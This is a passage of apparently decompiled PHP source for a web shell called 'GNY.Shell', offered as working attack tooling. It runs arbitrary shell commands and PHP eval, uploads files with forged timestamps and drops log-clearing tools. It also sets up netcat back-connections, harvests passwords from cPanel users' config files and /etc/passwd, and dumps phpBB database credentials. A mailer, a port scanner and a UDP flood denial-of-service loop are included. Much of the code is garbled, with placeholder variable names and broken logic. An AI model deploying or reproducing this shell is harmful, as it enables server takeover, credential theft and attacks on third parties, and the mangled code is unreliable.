"; } } } if ( $act == "phpproxy" ) { echo "Install PHP Based Proxy
\r\n \r\n"; if ( $_GET['install'] == "yup" ) { if ( is_writable( $_GET['path'] ) ) { cf( $_GET['path']."proxy.php", $phpproxy ); echo "proxy.php was created in ".htmlentities( $_GET['path'] ).""; chmod( $_GET['path']."/proxy.php", 511 ); } else { echo "Directory is not writable!
"; } } } if ( $act == "selfremove" ) { if ( $_GET['bai'] == "k" ) { if ( unlink( "D:\\Hacker\\CD3\\ÇÏæÇÊ ÇáÇÎÊÑÇÞ\\gaza.php" ) ) { @ob_clean( ); echo "GNY.Shell has been deleted and is now gone."; gnyexit( ); } else { echo "Cannot delete "."D:\\Hacker\\CD3\\ÇÏæÇÊ ÇáÇÎÊÑÇÞ\\gaza.php"."!"; } } else { echo "Are you sure you want to permanently remove "."D:\\Hacker\\CD3\\ÇÏæÇÊ ÇáÇÎÊÑÇÞ\\gaza.php"."?
Yes || No"; } } if ( $act == "update" ) { $ret = sh_getupdate( !( !$confirmupdate ) ); echo "".$ret.""; if ( stristr( $ret, "new version" ) ) { echo "

"; } } if ( $act == "search" ) { echo "Search in file-system:
"; if ( isset( $search_in ) ) { $search_in = $d; } if ( isset( $search_name ) ) { $search_name = "(.*)"; $search_name_regexp = 1; } if ( isset( $search_text_wwo ) ) { $search_text_regexp = 0; } if ( !isset( $submit ) ) { $found = array( ); $found_d = 0; $found_f = 0; $search_i_f = 0; $search_i_d = 0; $a = array( "name"=>$search_name, "name_regexp"=>$search_name_regexp, "text"=>$search_text, "text_regexp"=>$search_text_regxp, "text_wwo"=>$search_text_wwo, "text_cs"=>$search_text_cs, "text_not"=>$search_text_not ); $searchtime = getmicrotime( ); $in = array_unique( explode( ";", $search_in ) ); foreach ( $in as $v ) { fsearch( $v ); } $searchtime = round( getmicrotime( ) - $searchtime, 4 ); if ( count( $found ) == 0 ) { echo "No files found!"; } else { $ls_arr = $found; $disp_fullpath = TRUE; $act = "ls"; } } echo " "; if ( $act == "ls" ) { $dspact = $act; echo "

Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round( ( $search_i_f + $search_i_d ) / $searchtime, 4 )." objects per second).

"; } } if ( $act == "chmod" ) { $mode = fileperms( $d.$f ); if ( !$mode ) { echo "Change file-mode with error: can't get current value."; } $form = TRUE; if ( $chmod_submit ) { $octet = "0".base_convert( ( $chmod_o['r'] ? 1 : 0 ).( $chmod_o['w'] ? 1 : 0 ).( $chmod_o['x'] ? 1 : 0 ).( $chmod_g['r'] ? 1 : 0 ).( $chmod_g['w'] ? 1 : 0 ).( $chmod_g['x'] ? 1 : 0 ).( $chmod_w['r'] ? 1 : 0 ).( $chmod_w['w'] ? 1 : 0 ).( $chmod_w['x'] ? 1 : 0 ), 2, 8 ); if ( chmod( $d.$f, $octet ) ) { $act = "ls"; $form = FALSE; $err = ""; } else { $err = "Can't chmod to ".$octet."."; } } if ( $form ) { $perms = parse_perms( $mode ); echo "Changing file-mode (".$d.$f."), ".view_perms_color( $d.$f )." (".substr( decoct( fileperms( $d.$f ) ), 0 - 4, 4 ).")
".( $err ? "Error: ".$err : "" )."

Owner Read Write Execute	Group Read Write Execute	World Read Write Execute

"; } } if ( $act == "upload" ) { $uploadmess = ""; $uploadpath = str_replace( "\\", DIRECTORY_SEPARATOR, $uploadpath ); if ( isset( $uploadpath ) ) { $uploadpath = $d; } else if ( substr( $uploadpath, 0 - 1 ) != "/" ) { $uploadpath .= "/"; } if ( !isset( $submit ) ) { iglobal $HTTP_POST_FILES; $uploadfile = $HTTP_POST_FILES['uploadfile']; if ( !isset( $uploadfile['tmp_name'] ) ) { if ( isset( $uploadfilename ) ) { $destin = $uploadfile['name']; } else { $destin = $userfilename; } if ( !move_uploaded_file( $uploadfile['tmp_name'], $uploadpath.$destin ) ) { $uploadmess .= "Error uploading file ".$uploadfile['name']." (can't copy \"".$uploadfile['tmp_name']."\" to \"".$uploadpath.$destin."\"!
"; } } else if ( !isset( $uploadurl ) ) { if ( !isset( $uploadfilename ) ) { $destin = $uploadfilename; } $destin = explode( "/", $destin ); $destin = $destin[count( $destin ) - 1]; if ( isset( $destin ) ) { $i = 0; $b = ""; while ( file_exists( $uploadpath.$destin ) ) { if ( 0 < $i ) { $b = "_".$i; } $destin = "index".$b.".html"; $i++; } } if ( !eregi( "http://", $uploadurl ) && !eregi( "https://", $uploadurl ) && !eregi( "ftp://", $uploadurl ) ) { echo "Incorect url!
"; } $st = getmicrotime( ); $content = file_get_contents( $uploadurl ); $dt = round( getmicrotime( ) - $st, 4 ); if ( !$content ) { $uploadmess .= "Can't download file!
"; } else if ( $filestealth ) { $stat = stat( $uploadpath.$destin ); } else { $fp = fopen( $uploadpath.$destin, "w" ); if ( !$fp ) { $uploadmess .= "Error writing to file ".htmlspecialchars( $destin )."!
"; } fwrite( $fp, $content, strlen( $content ) ); fclose( $fp ); if ( $filestealth ) { touch( $uploadpath.$destin, $stat[9], $stat[8] ); } } } } if ( $miniform ) { echo "".$uploadmess.""; $act = "ls"; } else { echo "File upload:
".$uploadmess." "; } } if ( $act == "md5file" ) { echo "MD5 Checksum:
\r\n

".md5_file( $v )."

".$v."

"; echo " \r\n

"; $act = "ls"; } if ( $act == "sha1file" ) { echo "SHA1 Checksum:
\r\n

".sha1_file( $v )."

".$v."

"; $act = "ls"; } if ( $act == "delete" ) { $delerr = ""; foreach ( $actbox as $v ) { $result = FALSE; $result = fs_rmobj( $v ); if ( !$result ) { $delerr .= "Can't delete ".htmlspecialchars( $v )."
"; } } if ( !isset( $delerr ) ) { echo "Deleting with errors:
".$delerr; } $act = "ls"; } if ( !$usefsbuff ) { if ( $act == "paste" || $act == "copy" || $act == "cut" || $act == "unselect" ) { echo "Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE."; } } else if ( $act == "copy" ) { $err = ""; $sess_data['copy'] = array_merge( $sess_data['copy'], $actbox ); sess_put( $sess_data ); $act = "ls"; } else if ( $act == "cut" ) { $sess_data['cut'] = array_merge( $sess_data['cut'], $actbox ); sess_put( $sess_data ); $act = "ls"; } else if ( $act == "unselect" ) { foreach ( $sess_data['copy'] as $k=>$v ) { if ( in_array( $v, $actbox ) ) { } } foreach ( $sess_data['cut'] as $k=>$v ) { if ( in_array( $v, $actbox ) ) { } } sess_put( $sess_data ); $act = "ls"; } if ( $actemptybuff ) { $sess_data['copy'] = $sess_data['cut'] = array( ); sess_put( $sess_data ); } else if ( $actpastebuff ) { $psterr = ""; foreach ( $sess_data['copy'] as $k=>$v ) { $to = $d.basename( $v ); if ( !fs_copy_obj( $v, $to ) ) { $psterr .= "Can't copy ".$v." to ".$to."!
"; } if ( $copy_unset ) { } } foreach ( $sess_data['cut'] as $k=>$v ) { $to = $d.basename( $v ); if ( !fs_move_obj( $v, $to ) ) { $psterr .= "Can't move ".$v." to ".$to."!
"; } } sess_put( $sess_data ); if ( !isset( $psterr ) ) { echo "Pasting with errors:
".$psterr; } $act = "ls"; } else if ( $actarcbuff ) { $arcerr = ""; if ( substr( $actarcbuff_path, 0 - 7, 7 ) == ".tar.gz" ) { $ext = ".tar.gz"; } else { $ext = ".tar.gz"; } if ( $ext == ".tar.gz" ) { $cmdline = "tar cfzv"; } $cmdline .= " ".$actarcbuff_path; $objects = array_merge( $sess_data['copy'], $sess_data['cut'] ); foreach ( $objects as $v ) { $v = str_replace( "\\", DIRECTORY_SEPARATOR, $v ); if ( substr( $v, 0, strlen( $d ) ) == $d ) { $v = basename( $v ); } if ( is_dir( $v ) ) { if ( substr( $v, 0 - 1 ) != DIRECTORY_SEPARATOR ) { $v .= DIRECTORY_SEPARATOR; } $v .= "*"; } $cmdline .= " ".$v; } $tmp = realpath( "." ); chdir( $d ); $ret = myshellexec( $cmdline ); chdir( $tmp ); if ( isset( $ret ) ) { $arcerr .= "Can't call archivator (".htmlspecialchars( str2mini( $cmdline, 60 ) ).")!
"; } $ret = str_replace( "\r\n", "\n", $ret ); $ret = explode( "\n", $ret ); if ( $copy_unset ) { foreach ( $sess_data['copy'] as $k=>$v ) { } } foreach ( $sess_data['cut'] as $k=>$v ) { if ( in_array( $v, $ret ) ) { fs_rmobj( $v ); } } sess_put( $sess_data ); if ( !isset( $arcerr ) ) { echo "Archivation errors:
".$arcerr; } $act = "ls"; } else if ( $actpastebuff ) { $psterr = ""; foreach ( $sess_data['copy'] as $k=>$v ) { $to = $d.basename( $v ); if ( !fs_copy_obj( $v, $d ) ) { $psterr .= "Can't copy ".$v." to ".$to."!
"; } if ( $copy_unset ) { } } foreach ( $sess_data['cut'] as $k=>$v ) { $to = $d.basename( $v ); if ( !fs_move_obj( $v, $d ) ) { $psterr .= "Can't move ".$v." to ".$to."!
"; } } sess_put( $sess_data ); if ( !isset( $psterr ) ) { echo "Pasting with errors:
".$psterr; } $act = "ls"; } if ( $act == "zap2" ) { if ( is_writable( "." ) ) { cf( $act, ${ $act } ); chmod( $act, 511 ); $cmd = "./".$act; $act = "cmd"; $cmd_txt = "1"; } else { echo "Directory Is Not Writable!
"; } } if ( $act == "clearlogs" ) { if ( is_writable( "." ) ) { cf( $act.".exe", ${ $act } ); chmod( $act.".exe", 511 ); $cmd = $act.".exe"; $act = "cmd"; $cmd_txt = "1"; } else { echo "Directory Is Not Writable!
"; } } if ( $act == "cmd" ) { if ( trim( $cmd ) == "ps -aux" ) { $act = "processes"; } @chdir( $chdir ); if ( !isset( $submit ) ) { echo "Result of execution this command:
"; $olddir = realpath( "." ); @chdir( $d ); $ret = myshellexec( $cmd ); $ret = convert_cyr_string( $ret, "d", "w" ); if ( $cmd_txt ) { $rows = count( explode( "\r\n", $ret ) ) + 1; if ( $rows < 10 ) { $rows = 10; } echo "

".htmlspecialchars( $ret )."

"; } else { echo $ret."
"; } @chdir( $olddir ); echo "Execution command"; } else if ( isset( $cmd_txt ) ) { $cmd_txt = TRUE; } echo "

Display in text-area "; } $objects = array( ); $vd = "f"; if ( $vd == "f" ) { $objects['head'] = array( ); $objects['folders'] = array( ); $objects['links'] = array( ); $objects['files'] = array( ); foreach ( $list as $v ) { $o = basename( $v ); $row = array( ); if ( $o == "." ) { $Var_5295[$row] = $d.$o; $Var_5301[$row] = "LINK"; } else if ( $o == ".." ) { $Var_5306[$row] = $d.$o; $Var_5312[$row] = "LINK"; } else if ( is_dir( $v ) ) { if ( is_link( $v ) ) { $type = "LINK"; } else { $type = "DIR"; } $Var_5323[$row] = $v; $Var_5327[$row] = $type; } else if ( is_file( $v ) ) { $Var_5333[$row] = $v; $Var_5337[$row] = filesize( $v ); } $Var_5342[$row] = filemtime( $v ); if ( !$win ) { $ow = posix_getpwuid( fileowner( $v ) ); $gr = posix_getgrgid( filegroup( $v ) ); $Var_5359[$row] = ( $ow['name'] ? $ow['name'] : fileowner( $v ) )."/".( $gr['name'] ? $gr['name'] : filegroup( $v ) ); } $Var_5378[$row] = fileperms( $v ); if ( $o == "." || $o == ".." ) { $Var_5388[$objects['head']] = $row; } else if ( is_link( $v ) ) { $Var_5395[$objects['links']] = $row; } else if ( is_dir( $v ) ) { $Var_5402[$objects['folders']] = $row; } else if ( is_file( $v ) ) { $Var_5409[$objects['files']] = $row; } $i++; } $row = array( ); $Var_5418[$row] = "Name"; $Var_5421[$row] = "Size"; $Var_5424[$row] = "Modify"; if ( !$win ) { $Var_5429[$row] = "Owner/Group"; } $Var_5432[$row] = "Perms"; $Var_5435[$row] = "Action"; $parsesort = parsesort( $sort ); $sort = $parsesort[0].$parsesort[1]; $k = $parsesort[0]; if ( $parsesort[1] != "a" ) { $parsesort[1] = "d"; } $y = ""; $y .= $parsesort[1] == "a" ? " [asc]" : " [desc]"; $row[$k] .= $y; $i = 0; for ( ; $i < count( $row ) - 1; $i++ ) { if ( $i != $k ) { $row[$i] = "".$row[$i].""; } } $v = $parsesort[0]; usort( &$objects['folders'], "tabsort" ); usort( &$objects['links'], "tabsort" ); usort( &$objects['files'], "tabsort" ); if ( $parsesort[1] == "d" ) { $objects['folders'] = array_reverse( $objects['folders'] ); $objects['files'] = array_reverse( $objects['files'] ); } $objects = array_merge( $objects['head'], $objects['folders'], $objects['links'], $objects['files'] ); $tab = array( ); $tab['cols'] = array( ); $tab['head'] = array( ); $tab['folders'] = array( ); $tab['links'] = array( ); $tab['files'] = array( ); $i = 0; foreach ( $objects as $a ) { $v = $a[0]; $o = basename( $v ); $dir = dirname( $v ); if ( $disp_fullpath ) { $disppath = $v; } else { $disppath = $o; } $disppath = str2mini( $disppath, 60 ); if ( in_array( $v, $sess_data['cut'] ) ) { $disppath = "~~".$disppath."~~"; } else if ( in_array( $v, $sess_data['copy'] ) ) { $disppath = "".$disppath.""; } foreach ( $regxp_highlight as $r ) { if ( ereg( $r[0], $o ) ) { if ( !is_numeric( $r[1] ) || 3 < $r[1] ) { $r[1] = 0; ob_clean( ); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; gnyexit( ); } $r[1] = round( $r[1] ); $isdir = is_dir( $v ); if ( $r[1] == 0 || $r[1] == 1 && !$isdir || $r[1] == 2 && !$isdir ) { if ( isset( $r[2] ) ) { $r[2] = ""; $r[3] = ""; } $disppath = $r[2].$disppath.$r[3]; if ( $r[4] ) { break; } } } } $uo = urlencode( $o ); $ud = urlencode( $dir ); $uv = urlencode( $v ); $row = array( ); if ( $o == "." ) { $Var_5722[$row] = "".$o.""; $Var_5744[$row] = "LINK"; } else if ( $o == ".." ) { $Var_5749[$row] = "".$o.""; $Var_5771[$row] = "LINK"; } else if ( is_dir( $v ) ) { if ( is_link( $v ) ) { $disppath .= " => ".readlink( $v ); $type = "LINK"; $Var_5785[$row] = "[".$disppath."]"; } else { $type = "DIR"; $Var_5802[$row] = "[".$disppath."]"; } $Var_5817[$row] = $type; } else if ( is_file( $v ) ) { $ext = explode( ".", $o ); $c = count( $ext ) - 1; $ext = $ext[$c]; $ext = strtolower( $ext ); $Var_5841[$row] = " ".$disppath.""; $Var_5856[$row] = view_size( $a[1] ); } $Var_5862[$row] = date( "d.m.Y H:i:s", $a[2] ); if ( !$win ) { $Var_5870[$row] = $a[3]; } $Var_5875[$row] = "".view_perms_color( $v ).""; if ( $o == "." ) { $checkbox = ""; $i--; } else { $checkbox = ""; } if ( is_dir( $v ) ) { $Var_5908[$row] = "[info] ".$checkbox; } else { $Var_5919[$row] = "[info] [change] [download] ".$checkbox; } if ( $o == "." || $o == ".." ) { $Var_5956[$tab['head']] = $row; } else if ( is_link( $v ) ) { $Var_5963[$tab['links']] = $row; } else if ( is_dir( $v ) ) { $Var_5970[$tab['folders']] = $row; } else if ( is_file( $v ) ) { $Var_5977[$tab['files']] = $row; } $i++; } } $table = array_merge( $tab['cols'], $tab['head'], $tab['folders'], $tab['links'], $tab['files'] ); echo "Listing folder (".count( $tab['files'] )." files and ".( count( $tab['folders'] ) + count( $tab['links'] ) )." folders):

\r\n \r\n \r\n "; if ( 0 < count( array_merge( $sess_data['copy'], $sess_data['cut'] ) ) && $usefsbuff ) { echo " "; } echo "

"; } if ( $act == "processes" ) { echo "Processes:
"; if ( !$win ) { $handler = "ps -aux".( $grep ? " | grep '".addslashes( $grep )."'" : "" ); } else { $handler = "tasklist"; } $ret = myshellexec( $handler ); if ( !$ret ) { echo "Can't execute \"".$handler."\"!"; } else if ( isset( $processes_sort ) ) { $processes_sort = $sort_default; } else { $parsesort = parsesort( $processes_sort ); if ( !is_numeric( $parsesort[0] ) ) { $parsesort[0] = 0; } $k = $parsesort[0]; if ( $parsesort[1] != "a" ) { $y = " [sort]"; } else { $y = " [sort]"; } $ret = htmlspecialchars( $ret ); if ( !$win ) { if ( $pid ) { if ( is_null( $sig ) ) { $sig = 9; } echo "Sending signal ".$sig." to #".$pid."... "; if ( posix_kill( $pid, $sig ) ) { echo "OK."; } else { echo "ERROR."; } } while ( ereg( " ", $ret ) ) { $ret = str_replace( " ", " ", $ret ); } $stack = explode( "\n", $ret ); $head = explode( " ", $stack[0] ); unset( $stack[0] ); $i = 0; for ( ; $i < count( $head ); $i++ ) { if ( $i != $k ) { $head[$i] = "".$head[$i].""; } } $prcs = array( ); foreach ( $stack as $line ) { if ( !isset( $line ) ) { echo "

".$v."

"; } } if ( $act == "eval" ) { if ( !isset( $eval ) ) { echo "Result of execution this PHP-code:
"; $tmp = ob_get_contents( ); $olddir = realpath( "." ); @chdir( $d ); if ( $tmp ) { ob_clean( ); eval( $eval ); $ret = ob_get_contents( ); $ret = convert_cyr_string( $ret, "d", "w" ); ob_clean( ); echo $tmp; if ( $eval_txt ) { $rows = count( explode( "\r\n", $ret ) ) + 1; if ( $rows < 10 ) { $rows = 10; } echo "

".htmlspecialchars( $ret )."

"; } else { echo $ret."
"; } } else if ( $eval_txt ) { echo "

";
eval( $eval );
echo "

"; } else { echo $ret; } @chdir( $olddir ); echo "Execute PHP-code"; } else if ( isset( $eval_txt ) ) { $eval_txt = TRUE; } echo " "; if ( isset( $_GET['name'] ) ) { rename( $d.$f, $d.$_GET['name'] ); if ( file_exists( $d.$_GET['name'] ) ) { echo "".$f." renamed ".$_GET['name']." successfully."; } else { echo "Error renaming file (incorrect permissions?)"; } } } else if ( $ft == "phpsess" ) { echo "

"; } else { echo "File does not exists (".htmlspecialchars( $d.$f ).")!
Create"; } } $r = file_get_contents( $d.$f ); $ext = explode( ".", $f ); $c = count( $ext ) - 1; $ext = $ext[$c]; $ext = strtolower( $ext ); $rft = ""; foreach ( $ftypes as $k=>$v ) { if ( in_array( $ext, $v ) ) { $rft = $k; break; } } if ( eregi( "sess_(.*)", $f ) ) { $rft = "phpsess"; } if ( isset( $ft ) ) { $ft = $rft; } $arr = array( , array( "[rename]", "rename" ), array( "[html]", "html" ), array( "[txt]", "txt" ), array( "[code]", "code" ), array( "[session]", "phpsess" ), array( "[exe]", "exe" ), array( "[sdb]", "sdb" ), array( "[img]", "img" ), array( "[ini]", "ini" ), array( "[download]", "download" ), array( "[notepad]", "notepad" ), array( "[edit]", "edit" ) ); echo "Viewing file: ".$f." (".view_size( filesize( $d.$f ) ).") ".view_perms_color( $d.$f )."
Select action/file-type:
"; foreach ( $arr as $t ) { if ( $t[1] == $rft ) { echo " ".$t[0].""; } else if ( $t[1] == $ft ) { echo " ".$t[0].""; } else { echo " ".$t[0].""; } echo " (+) |"; } echo "

"; if ( $ft == "info" ) { echo "Information:

Path	".$d.$f."
Size	".view_size( filesize( $d.$f ) )."
MD5	".md5_file( $d.$f )."
Owner/Group	"; $ow = posix_getpwuid( fileowner( $d.$f ) ); $gr = posix_getgrgid( filegroup( $d.$f ) ); echo ( $ow['name'] ? $ow['name'] : fileowner( $d.$f ) )."/".( $gr['name'] ? $gr['name'] : filegroup( $d.$f ) ); } echo "
Perms	".view_perms_color( $d.$f )."
Create time	".date( "d/m/Y H:i:s", filectime( $d.$f ) )."
Access time	".date( "d/m/Y H:i:s", fileatime( $d.$f ) )."
MODIFY time	".date( "d/m/Y H:i:s", filemtime( $d.$f ) )."

"; $fi = fopen( $d.$f, "rb" ); if ( $fi ) { if ( $fullhexdump ) { echo "FULL HEXDUMP"; $str = fread( $fi, filesize( $d.$f ) ); } else { echo "HEXDUMP PREVIEW"; $str = fread( $fi, $hexdump_lines * $hexdump_rows ); } $n = 0; $a0 = "00000000
"; $a1 = ""; $a2 = ""; $i = 0; for ( ; $i < strlen( $str ); $i++ ) { $a1 .= sprintf( "%02X", ord( $str[$i] ) )." "; switch ( ord( $str[$i] ) ) { case 0 : $a2 .= "0"; break; case 32 : case 10 : case 13 : $a2 .= " "; break; default : $a2 .= htmlspecialchars( $str[$i] ); } $n++; if ( $n == $hexdump_rows ) { $n = 0; if ( $i + 1 < strlen( $str ) ) { $a0 .= sprintf( "%08X", $i + 1 )."
"; } $a1 .= "
"; $a2 .= "
"; } } echo "

".$a0."

".$a1."

".$a2."

"; } $encoded = ""; if ( $base64 == 1 ) { echo "Base64 Encode
"; $encoded = base64_encode( file_get_contents( $d.$f ) ); } else if ( $base64 == 2 ) { echo "Base64 Encode + Chunk
"; $encoded = chunk_split( base64_encode( file_get_contents( $d.$f ) ) ); } else if ( $base64 == 3 ) { echo "Base64 Encode + Chunk + Quotes
"; $encoded = base64_encode( file_get_contents( $d.$f ) ); $encoded = substr( preg_replace( "!.{1,76}!", "'\\0'.\n", $encoded ), 0, 0 - 2 ); } else if ( $base64 == 4 ) { $text = file_get_contents( $d.$f ); $encoded = base64_decode( $text ); echo "Base64 Decode"; if ( base64_encode( $encoded ) != $text ) { echo " (failed)"; } echo "
"; } if ( !isset( $encoded ) ) { echo "

"; } echo "HEXDUMP: [Full] [Preview]
Base64: \r\n[Encode] \r\n[+chunk] \r\n[+chunk+quotes] \r\n[Decode] \r\n

"; } else if ( $ft == "html" ) { if ( $white ) { @ob_clean( ); } echo $r; if ( $white ) { gnyexit( ); } } else if ( $ft == "txt" ) { echo "

".htmlspecialchars( $r )."

"; } else if ( $ft == "ini" ) { echo "

";
            var_dump( parse_ini_file( $d.$f, TRUE ) );
            echo "

"; } else if ( $ft == "rename" ) { echo "\r\n \r\n \r\n \r\n \r\n \r\n New name:
\r\n

";
            $v = explode( "|", $r );
            echo $v[0]."
";
            var_dump( unserialize( $v[1] ) );
            echo "

"; } else if ( $ft == "exe" ) { $ext = explode( ".", $f ); $c = count( $ext ) - 1; $ext = $ext[$c]; $ext = strtolower( $ext ); $rft = ""; foreach ( $exeftypes as $k=>$v ) { if ( in_array( $ext, $v ) ) { $rft = $k; break; } } $cmd = str_replace( "%f%", $f, $rft ); echo "Execute file: "; } else if ( $ft == "sdb" ) { echo "

";
            var_dump( unserialize( base64_decode( $r ) ) );
            echo "

"; } else if ( $ft == "code" ) { if ( ereg( "php"."BB 2.(.*) auto-generated config file", $r ) ) { $arr = explode( "\n", $r ); if ( count( $arr == 18 ) ) { include( $d.$f ); echo "phpBB configuration is detected in this file!
"; if ( $dbms == "mysql4" ) { $dbms = "mysql"; } if ( $dbms == "mysql" ) { echo "Connect to DB

"; } else { echo "You cannot connect to forum database, because the database software of \"".$dbms."\" is not supported by GNY.Shell"; } echo "Parameters for manual connect:
"; $cfgvars = array( "dbms"=>$dbms, "dbhost"=>$dbhost, "dbname"=>$dbname, "dbuser"=>$dbuser, "dbpasswd"=>$dbpasswd ); foreach ( $cfgvars as $k=>$v ) { echo htmlspecialchars( $k )."='".htmlspecialchars( $v )."'
"; } echo "

"; } } echo "

"; if ( !isset( $white ) ) { @ob_clean( ); } highlight_file( $d.$f ); if ( !isset( $white ) ) { gnyexit( ); } echo "

"; } else if ( $ft == "download" ) { @ob_clean( ); header( "Content-type: application/octet-stream" ); header( "Content-length: ".filesize( $d.$f ) ); header( "Content-disposition: attachment; filename=\"".$f."\";" ); echo $r; exit( ); } else if ( $ft == "notepad" ) { @ob_clean( ); header( "Content-type: text/plain" ); header( "Content-disposition: attachment; filename=\"".$f.".txt\";" ); echo $r; exit( ); } else if ( $ft == "img" ) { $inf = getimagesize( $d.$f ); if ( !$white ) { if ( isset( $imgsize ) ) { $imgsize = 20; } $width = $inf[0] / 100 * $imgsize; $height = $inf[1] / 100 * $imgsize; echo "Size: "; $sizes = array( "100", "50", "20" ); foreach ( $sizes as $v ) { echo ""; if ( $imgsize != $v ) { echo $v; } else { echo "".$v.""; } echo "% "; } echo "

"; } else { @ob_clean( ); $ext = explode( $f, "." ); $ext = $ext[count( $ext ) - 1]; header( "Content-type: ".$inf['mime'] ); readfile( $d.$f ); exit( ); } } else if ( $ft == "edit" ) { if ( !isset( $submit ) ) { if ( $filestealth ) { $stat = stat( $d.$f ); } $fp = fopen( $d.$f, "w" ); if ( !$fp ) { echo "Can't write to file!"; } echo "Saved!"; fwrite( $fp, $edit_text ); fclose( $fp ); if ( $filestealth ) { touch( $d.$f, $stat[9], $stat[8] ); } $r = $edit_text; } $rows = count( explode( "\r\n", $r ) ); if ( $rows < 10 ) { $rows = 10; } if ( 30 < $rows ) { $rows = 30; } echo " "; } else if ( !isset( $ft ) ) { echo "Manually selected type is incorrect."; } else { echo "Unknown extension (".$ext."), please, select type manually."; } } } @ob_clean( ); $imgequals = array( "ext_tar"=>array( "ext_tar", "ext_r00", "ext_ace", "ext_arj", "ext_bz", "ext_bz2", "ext_tbz", "ext_tbz2", "ext_tgz", "ext_uu", "ext_xxe", "ext_zip", "ext_cab", "ext_gz", "ext_iso", "ext_lha", "ext_lzh", "ext_pbk", "ext_rar", "ext_uuf" ), "ext_php"=>array( "ext_php", "ext_php3", "ext_php4", "ext_php5", "ext_phtml", "ext_shtml", "ext_htm" ), "ext_jpg"=>array( "ext_jpg", "ext_gif", "ext_png", "ext_jpeg", "ext_jfif", "ext_jpe", "ext_bmp", "ext_ico", "ext_tif", "tiff" ), "ext_html"=>array( "ext_html", "ext_htm" ), "ext_avi"=>array( "ext_avi", "ext_mov", "ext_mvi", "ext_mpg", "ext_mpeg", "ext_wmv", "ext_rm" ), "ext_lnk"=>array( "ext_lnk", "ext_url" ), "ext_ini"=>array( "ext_ini", "ext_css", "ext_inf" ), "ext_doc"=>array( "ext_doc", "ext_dot" ), "ext_js"=>array( "ext_js", "ext_vbs" ), "ext_cmd"=>array( "ext_cmd", "ext_bat", "ext_pif" ), "ext_wri"=>array( "ext_wri", "ext_rtf" ), "ext_swf"=>array( "ext_swf", "ext_fla" ), "ext_mp3"=>array( "ext_mp3", "ext_au", "ext_midi", "ext_mid" ), "ext_htaccess"=>array( "ext_htaccess", "ext_htpasswd", "ext_ht", "ext_hta", "ext_so" ) ); if ( !$getall ) { header( "Content-type: image/gif" ); header( "Cache-control: public" ); header( "Expires: ".date( "r", mktime( 0, 0, 0, 1, 1, 2030 ) ) ); header( "Cache-control: max-age=".60 * 60 * 24 * 7 ); header( "Last-Modified: ".date( "r", filemtime( "D:\\Hacker\\CD3\\ÇÏæÇÊ ÇáÇÎÊÑÇÞ\\gaza.php" ) ) ); foreach ( $imgequals as $k=>$v ) { if ( in_array( $img, $v ) ) { $img = $k; break; } } if ( isset( $images[$img] ) ) { $img = "small_unk"; } if ( in_array( $img, $ext_tar ) ) { $img = "ext_tar"; } echo base64_decode( $images[$img] ); } foreach ( $imgequals as $a=>$b ) { foreach ( $b as $d ) { if ( $a != $d ) { if ( !isset( $images[$d] ) ) { echo "Warning! Remove \$images[".$d."]
"; } } } } natsort( &$images ); $k = array_keys( $images ); echo ""; foreach ( $k as $u ) { echo "[".$u."]
"; } echo ""; exit( ); if ( $act == "backc" ) { $ip = $_SERVER['REMOTE_ADDR']; $msg = $_POST['backcconnmsg']; $emsg = $_POST['backcconnmsge']; echo "Back-Connection:

Host: Port: Use:
First, run NetCat on your computer using 'nc -l -n -v -p ".$bc_port."'. Then, click \"Connect\" once the port is listening."; echo $msg; echo $emsg; } if ( $act == "rip" ) { echo "\r\n"; } if ( $act == "users" ) { $users = file( "/etc/passwd" ); echo "

".$user[0]." ".$user[5]."

"; } if ( $act == "cpanel" ) { if ( $_GET['go'] == "go" ) { set_time_limit( 0 ); $passwd = fopen( "/etc/passwd", "r" ); if ( !$passwd ) { echo "[-] Error : coudn't read /etc/passwd"; exit( ); } $path_to_public = array( ); $users = array( ); $pathtoconf = array( ); $i = 0; while ( !feof( $passwd ) ) { $str = fgets( $passwd ); if ( 35 < $i ) { $pos = strpos( $str, ":" ); $username = substr( $str, 0, $pos ); $dirz = "/home/$username/public_html/"; if ( $username != "" ) { if ( is_readable( $dirz ) ) { array_push( &$users, $username ); array_push( &$path_to_public, $dirz ); } } } $i++; } echo "

"; echo ""; echo "[+] Found ".sizeof( $users )." entrys in /etc/passwd\n"; echo "[+] Found ".sizeof( $path_to_public )." readable public_html directories\n"; echo "[~] Searching for passwords in config.* files...\n\n"; foreach ( $users as $user ) { $path = "/home/$user/public_html/"; read_dir( $path, $user ); } echo "\n[+] Done\n"; echo "
"; } else { echo "Are you sure you would like to search for cPanel accounts on this website/server?
Please note this may take a long time to execute depending on the website/server it is run on.

Yes || No"; } } if ( $act == "phptools" ) { echo ""; echo "Mailer
\r\n
\r\n\r\n
\r\n
\r\n
\r\n
\r\n
"; if ( isset( $_GET['to'] ) && isset( $_GET['from'] ) && isset( $_GET['subject'] ) && isset( $_GET['body'] ) ) { $headers = "From: ".$_GET['from']; mail( $_GET['to'], $_GET['subject'], $_GET['body'], $headers ); echo "Email sent."; } echo "
Port Scanner
"; $start = strip_tags( $_GET['start'] ); $end = strip_tags( $_GET['end'] ); $host = strip_tags( $_GET['host'] ); if ( isset( $_GET['host'] ) && is_numeric( $_GET['end'] ) && is_numeric( $_GET['start'] ) ) { $i = $start; for ( ; $i <= $end; $i++ ) { $fp = fsockopen( $host, $i, &$errno, &$errstr, 3 ); if ( $fp ) { echo "Port ".$i." is open
"; } flush( ); } } else { echo "
\r\n\r\nHost:
\r\n
\r\nPort start:
\r\n
\r\nPort end:
\r\n
\r\n\r\n
\r\n"; } if ( isset( $_GET['host'] ) && is_numeric( $_GET['time'] ) ) { $pakits = 0; ignore_user_abort( TRUE ); set_time_limit( 0 ); $exec_time = $_GET['time']; $time = time( ); $max_time = $time + $exec_time; $host = $_GET['host']; $i = 0; for ( ; $i < 65000; $i++ ) { $out .= "X"; } $pakits++; if ( $max_time < time( ) ) { break; } $rand = rand( 1, 65000 ); $fp = fsockopen( "udp://".$host, $rand, &$errno, &$errstr, 5 ); if ( $fp ) { fwrite( $fp, $out ); fclose( $fp ); } continue; echo "
UDP Flood
Completed with $pakits (".round( $pakits * 65 / 1024, 2 )." MB) packets averaging ".round( $pakits / $exec_time, 2 )." packets per second \n"; echo "

\r\n\t\t
\r\n\t\t\r\n\t\tHost: \r\n\t\tLength (seconds): \r\n\t\t
"; } else { echo "
UDP Flood
\r\n\t\t\t
